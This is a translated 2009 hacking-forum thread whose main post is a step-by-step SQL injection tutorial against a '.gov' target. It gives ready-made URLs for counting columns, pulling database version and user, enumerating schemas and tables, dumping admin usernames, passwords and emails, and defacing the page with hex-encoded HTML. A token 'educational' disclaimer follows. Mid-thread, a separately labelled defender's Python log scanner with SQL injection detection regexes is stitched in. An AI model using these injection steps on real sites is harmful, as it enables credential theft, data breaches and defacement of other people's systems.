[Tutorial] Advance SQL Injection

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploitation, covering tracks and backdoors, to securing the web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discussing bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so members can learn from it
adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am

[Tutorial] Advance SQL Injection

Post by adwisatya » Sun Dec 13, 2009 11:46 am

This paper is the advanced version of my first article. In this tutorial, we will try to get deeper into the website than normal using SQL Injection.

1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the site to see whether it has a bug. We only need to add a single quote at the end of the URL. So the URL becomes:
http://www.victim.gov/agent_detail.php?aid=9'
And an error appears.

2. We check the number of columns of that site.
To check the number of columns, we use "order by". Don't forget to add (-) after = and (--) at the end of the URL.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appears
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appears
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appears
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appears
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appears
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appears

Because with "order by 6" an error appeared, the number of columns is 5. The formula is n-1, where n is the "order by" number at which the error appears.

3. We check which number is exploitable.
We use "union all select".
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 comes from number_of_column; if number_of_column is 3, the query will be "union all select 1,2,3".

Number 3 appears. So 3 is the exploitable number.

4. We check the version of that site.
We use "version()". We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and this appears:
5.0.45-community-nt . We are lucky. We will be able to find out the names of the database, tables, and columns.

5. We check the user of that site.
We use "user()". We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and this appears:
root@localhost.
So the username is root.

6. We check the default database.
We use "database()". We only need to replace the exploitable number with database().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and this appears: "news"
So the default database of that site is "news".

7. We check all of the databases on that site.
We use "concat(schema_name) from information_schema.schemata".
We need to replace the exploitable number with "concat(schema_name)" and we must add "from information_schema.schemata" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of the databases on that site. Example:
news
information_schema
mysql
cms
connection
shop
etc

8. We check the table names of that site (default database).
This is the query if you want to see the table names of the default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()".
We need to replace the exploitable number with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see the table names of that database. Example:
admin
config
news
etc

9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]".
[hexa] is the result of the conversion when we convert text to hex. For example, the hex of "cms" is 636D73 and the hex of "admin" is 61646D696E.
For example, if the table is "admin", the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the names of the columns in that table. Example:
username
password
email
etc

10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name".
3a is the result when we convert ":" to hex; it will separate each dumped field. For example, we want to dump the data in table admin, columns username, password, email.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
The structure:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email

We have learned how to dump from the default database. So what about other databases?

11. Check table_name of another database.
For example, the other database is "cms".
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]", where [hex] is the result when we convert the name of the database to hex. The result if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user

12. Check column_name of the following tables.
For example, the table is "cms_order".
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]".
The hex of "cms_order" is 636D735F6F72646572. So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff

13. Dump data from the following columns.
For example, the column_names are order_id, order_reff.
We use "concat(column_name,0x3a,column_name2) from database.table".
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3a,order_reff),4,5 from cms.cms_order--
You will see the data :-) :-) :-) :-)

14. Fake deface using SQL injection.
We only need to convert HTML to hex.
Example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace the exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good :-D


The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANYTHING READERS DO.
"For those who use this for crime, the sin is on you."

http://xyber-breaker.blogspot.com
I'm not a hacker, but I want to be a hacker
http://www.lumajangcrew.org
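As an added defender's example (not part of the original post or the author's tutorial): a small Python scanner that reads access-log lines and flags the probe sequence walked through in steps 1 to 14 above (quote probe, "order by" column counting, "union all select", version()/user()/database(), information_schema enumeration, hex-encoded literals). The log lines, signature names and client IPs are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators mirroring the probe sequence in the post above; each regex is
# checked against the fully decoded parameter value.
SIGNATURES = [
    ("quote-probe",  re.compile(r"^\s*-?\d+'\s*$")),
    ("order-by",     re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("db-info-func", re.compile(r"\b(version|user|database)\s*\(\s*\)", re.I)),
    ("schema-enum",  re.compile(r"\binformation_schema\.(schemata|tables|columns)\b", re.I)),
    ("hex-literal",  re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
]

# Common Log Format; we only need the client IP and the request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

# Constructed sample lines (not a real log), shaped like the requests in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2009:11:46:01 +0700] "GET /agent_detail.php?aid=9 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [13/Dec/2009:11:46:05 +0700] "GET /agent_detail.php?aid=9%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [13/Dec/2009:11:46:30 +0700] "GET /agent_detail.php?aid=-9%20order%20by%206-- HTTP/1.1" 500 310',
    '203.0.113.7 - - [13/Dec/2009:11:47:10 +0700] "GET /agent_detail.php?aid=-9%20union%20all%20select%201,2,version(),4,5-- HTTP/1.1" 200 4880',
    '203.0.113.7 - - [13/Dec/2009:11:48:02 +0700] "GET /agent_detail.php?aid=-9%20union%20all%20select%201,2,concat(column_name),4,5%20from%20information_schema.columns%20where%20table_name=0x61646D696E-- HTTP/1.1" 200 4990',
    '198.51.100.4 - - [13/Dec/2009:11:49:00 +0700] "GET /agent_detail.php?aid=12 HTTP/1.1" 200 5200',
]

def scan_param(value):
    """Signature names that fire on one parameter value (decoded a second time to
    catch double-encoded payloads)."""
    decoded = unquote_plus(value)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log_line(line):
    """Return (ip, param, hits) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for param, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        hits = scan_param(value)
        if hits:
            return (m.group("ip"), param, hits)
    return None

def attackers(lines):
    """Aggregate per client IP: {ip: sorted signature names seen}; benign clients omitted."""
    seen = {}
    for finding in filter(None, map(scan_log_line, lines)):
        ip, _param, hits = finding
        seen.setdefault(ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in seen.items()}
```

On a real server the same checks belong in a WAF rule or the log pipeline; the actual fix for the page's endpoint is to bind aid as an integer parameter in agent_detail.php instead of concatenating it into the query string.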

komporgas
Posts: 24
Joined: Sat Jan 05, 2008 4:09 pm
Location: PADANG

Re: Advance SQL Injection

Post by komporgas » Sat Dec 19, 2009 3:24 pm

Amazing.
Develop your interest and prove your ability
Don't you dare drop by at http://elco.teknikelektronika.net and http://replayfrom.wordpress.com
Thank you :)

peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: Advance SQL Injection

Post by peniru » Sat Dec 19, 2009 10:21 pm

Whoa.. tsk tsk tsk
.::. My Sign .::.
..noobie Pool..
Whether you use tools or not doesn't matter; what matters is understanding what is being done
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet

Re: [Tutorial] Advance SQL Injection

Post by wiLMaR_kiDz » Sun Dec 20, 2009 6:57 pm

I've read this before.... heh..
Keep sharing, bro... :kaca: :kaca:
Carry on the journey... :ngakak: :tapa:
regards,
ordinary user,-

blabard
Posts: 10
Joined: Fri Feb 06, 2009 9:18 am
Location: BSD City

Re: [Tutorial] Advance SQL Injection

Post by blabard » Mon Dec 21, 2009 1:05 pm

Newbie here, just reading along, bro...

adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am

Re: [Tutorial] Advance SQL Injection

Post by adwisatya » Mon Dec 21, 2009 2:16 pm

@wiLMaR_kiDz, where did you read it, bro?
I'm not a hacker, but I want to be a hacker
http://www.lumajangcrew.org

wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet

Re: [Tutorial] Advance SQL Injection

Post by wiLMaR_kiDz » Mon Dec 21, 2009 4:55 pm

adwisatya wrote: @wiLMaR_kiDz, where did you read it, bro?
At: http://xyber-breaker.blogspot.com/2009/ ... ction.html
a.k.a. your own blog, bro...
Sorry, I didn't check first.. :putusasa: :putusasa:
Now I'm embarrassed....
:malumalu: :malumalu: :malumalu:
regards,
ordinary user,-

abah
Posts: 516
Joined: Sat Jul 12, 2008 4:26 pm
Location: Makassar

Re: [Tutorial] Advance SQL Injection

Post by abah » Mon Dec 21, 2009 5:00 pm

Great, bro, go for it
[b]Ukhuwah Networking Group Indonesia[/b]
Address: Jalan Makmur Nomor 41, Kota Makassar, Sulawesi Selatan
Home : 0411-454414 - 04112409679

[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]

adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am

Re: [Tutorial] Advance SQL Injection

Post by adwisatya » Tue Dec 22, 2009 5:04 am

Hihihi,,

No need to be embarrassed, bro,, just relax....
:-),,

If anything is missing, please add to it..
I'm not a hacker, but I want to be a hacker
http://www.lumajangcrew.org

3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~

Re: [Tutorial] Advance SQL Injection

Post by 3xtr3m3b0y » Tue Dec 22, 2009 10:18 am

abah wrote: Great, bro, go for it
Whoa, abah just wants to go all in, what's up with you, abah...???
Remember, abah, you're already old; just think of Kayla and Ummi at home, abah...
...n0 l1m17...
